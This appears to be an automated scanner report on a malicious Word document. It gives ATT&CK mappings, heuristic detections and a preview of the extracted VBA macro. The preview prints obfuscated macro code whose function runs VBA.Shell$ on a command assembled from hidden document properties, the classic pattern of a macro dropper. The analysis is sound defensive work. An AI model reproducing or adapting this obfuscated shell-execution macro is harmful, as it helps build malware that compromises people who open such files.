MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro triggers a 'Shell()' call, indicating an attempt to execute arbitrary commands. This is further supported by the ClamAV detection 'Doc.Macro.DollarShell-6346616-0', suggesting a known macro-based malware pattern. The primary IOC is the VBA macro file itself.
Heuristics 7
-
ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4474 bytes |
SHA-256: 259be7dac9bcc0bfdcad2808d9fb30b410e1247e7d30808461bdf2ae81bd07fe |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
'ggpuHSsmXvNTbzzcvmCFFBPHHrANmmUEEdYSdbPkaFcEshXRSEXmntbXhYsygGur
'eexUkNReFLsPpngMWKErPVGyKauYCFZWmZntthekBexAsbZHBRbkashzLXpxthRgE
'NFSvCPVKXHAURSdyXDwTFXNbpbLARxKSsefUXkuGkhhgCsCAArMZttbcGLuEEr
'hfRcRcmBZBehxnBcnvpdUzfDsYdhymWGfBScSLYfDZfRYgHXFeFVAdMWFTMFpxcScup
'pRKWeMxbRwUdDFHTBctdYntzskceNSKfWarTUKLWHuAPpEhPftZgWHwLscfDNWt
'PywppkWceSXvLnNWGfRhAwaKCAaNwuHStcCXGKwdDvkWDVnhwYZnEAhcYgFgUgBDy
'VahGPNnEePTdRVhAmGvhkvsRhXZCphKrRumGnzmbmCekVXFpzumpFCvMMvRKhkyL
'SZDuKTzzTdExCMaNyaVxeMNpABZMFDCacUVVxHEnAWzvpPuxageyecfpSyTzkNwg
'HWBbsCpCXAbhwsTtfTHznGDfLPLFPtyPnDAskWvHFExzEBfWBwVkfWanKRARg
'vSYxXvpRELbrtFpnxKawhPZVDzARfkwtcWHdFzhLUcNvDKWEzhHraeusaSpHxYa
'szuwRRgKxveNuEnwzYYptWtNtKMDLAvREyGgmpcHWhCPuHESgVZHFugzyYuAfyYV
'xbwHhNmPwvGVxcMuntncDCmnYDwBrNSwLVCbRbwKutGnnELkekScBzSShPxzm
'EeaVhXCZesYWHHkDXnNGhUNGhDewRzdrhGCLYKUBMFhxLkCuXaLvKLHhTBPnZ
'hrvuAdALVYFYLBvLMMFgSezEAkxApkFUDhBPtyhsZDMUnrdRsWDFTtkVhFeHhRT
'hYLPyLRBhKwdUZbnTVMFEGHkGcyTVMfYfbZVcMsCaeWGdLsThBxgmvpbsbMKaxF
'YdDKudfxepuaztxmNhzrwPMuuKUzMUZnWznRGpzBEmfeDypDYNKkRSXHHuvESU
'ResuSgZUMtBXphcwACKXGhpDDRXBydhzXgbMEasvuLMarMdLaxBRUXMFpuAMHxAYBvu
'CEapBLHpmxVEwmBnHxhNrmdVZgkSwtGyEgntaRgzHykaFngHbyChMrdFmsxUk
'KXskLvzYRMGMewfuVGwKrEkmsunapLgVBWeBFmtYysUnBZTstEsCLYMZeSeKUD
'tgWeBzNEzuXXzGKpxDPdkzBCWyLXTvMvhbpnZTYVuAcsfZaCmtmbvmCdZGmEd
'gFnCHwdsVUfCUsnCtDEvrxgWtPfPFXMDvNabCdKsMnMCzPACnbCPEaPacKTkWCgWW
'MpBnmuXxwrymVXbeGnzVzcBZVxayANDDAsktXGgaKFbpWpYRsMuCThLFyHRzcpv
'CBXnbrXHWaxYUkfCgkySyHMVvdMhwecebkhkCBanKkAEBBdBXCuHXNrNryKH
'FYmehDfygHrNyvepyGWkdPXCyUTfARwuHttvEePcNAKYNXMsVxkyKFKbtRvTzM
'vBRGPuRPvrLmebHXmWxkmUbRxdZSgxrzraXwDGNVCKmYLNgxbThYeCHemuRC
'YSWBZzvvsKbdbakBpMnFMFhXKydkNTCdYHTYUVNFNypWvykRAeLGCbhYGmNEtEBnDTf
'TmAkEbuXDUpHUcxcnFMKSzXChPSmEFccNxGXryegLkhKMpGBfPfLuypEu
'VNsPnAWVbwbzPvfAaHgBBuGXwcAgbUuFEDLRKrVnGcdtLxVXhfDDmphhWMDA
'wfyhpMSeepNWCDZSLnXcaszuuSyWzaNssDkLtXmLwxtuEwSwutGvHseCPkUMLKVE
Function mrvPptfzkcV()
NeHygZcf = "gwNvHgBUsVg" + "HXHbMucS" + "XCZbcXF" + "LBDsxchSHYU" + "ggFtYPNcx" + XLwNvurGVN = "SNYbUPpu" + "SPuwLfFpeVd" + "cVYuUTMSNma" + "UDcKyEnukxw" + "DzhkfpK" + fUtGbwRhvzp = "VXLrPhvyu" + "eEeWzZLfyg" + "egPMeYRWPW" + "dapwRpwbt" + "hwGAwrh" + "TARGbANcSmy"
VBA.Shell$ ActiveDocument.CustomDocumentProperties("xuTFwxm") + mLfhvdzeB + cKepbhEHcrx + rmRSLWW + fMCMwaAfzDp + XCVYPHyvaN + ssuWBpeWM + MSeDtrmbs + VDGwWHW + crSxxxcKsm + ZPCKDwtrmXr + zhcgzLyVGA + dEeKLrtz + VzDmaHN + RTPWcKMN + ActiveDocument.CustomDocumentProperties("AyprZdY") + mLfhvdzeB + cKepbhEHcrx + rmRSLWW + fMCMwaAfzDp + XCVYPHyvaN + ssuWBpeWM + MSeDtrmbs + VDGwWHW + crSxxxcKsm + ZPCKDwtrmXr + zhcgzLyVGA + dEeKLrtz + VzDmaHN + RTPWcKMN + ActiveDocument.BuiltInDocumentProperties("Comments") + mLfhvdzeB + cKepbhEHcrx + rmRSLWW + fMCMwaAfzDp + XCVYPHyvaN + ssuWBpeWM + MSeDtrmbs + VDGwWHW + crSxxxcKsm + ZPCKDwtrmXr + zhcgzLyVGA + dEeKLrtz + VzDmaHN + RTPWcKMN + eSSYxcKGuAf, 0
yXrKGgaEc = "UALhGKV" + "xCbTVErdd" + "BGVhSHheDG" + "CPWrTLmTMFF" + "NUnLtTSwt" + uSBcdYbB = "NuBXLgP" + "HTENypg" + "FRzmCrZutK" + "PUnyghBaE" + "ezdLvfAppVk" + "PGwzRLMcVSw"
End Function
'NegvPdExzZwpcRHwNKWVtspNcSkyRYwgxEVXAedKtMZcThmKwFsXxhmgugvD
'NvvzMAKNDkshVyVEbaRNGkMgFbDTZhsABAVEDzSgfWAzNsPEFseVCCzBpprUzuw
'zyKuwzhewbfZKXeXTpsKTaVBdyDEsSGPeuDHBmGEPPTXRLdbnfrTxafTgtR
'zBDPrbZtHFRUbHLYXvdTyMEpbbcwKMLafUPvCcpAFBHgAvvZxacuwXKLSLbRmSrP
'PtTYbrehBpKEPfTZeYNkesVxYyaPVNvFhauABYknDztxDLKwVazGdzNCngHBvtEEtCS
'dkhgSeUAZhawVpapvVWtwBCpdrNvPWpcnHLucSVvfAKGbVeDNmCkBpEYZMPgSXwRspt
'DsCUpktRgVLFZvaGafcnVXARgbYukxPhRypkuEfXnmAxChdBAvFxREXfs
'pALADbrzeSedneEtzVSWTUdHrWXsLTGxCMEMhpZBkNwbMtMhsmRLRgRRphNrVBZSKYMA
'ZBeaerwrgfBzHnutZsdcYavpcHapTmgEKWBKWwsxPeYxncmnsUPnzuAvNSRavuP
'YGhxfGgmdGfpSEZMugTcysLbkVCSvYGtkwkktNVvdCGAxVacLeXfrLvkNk
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.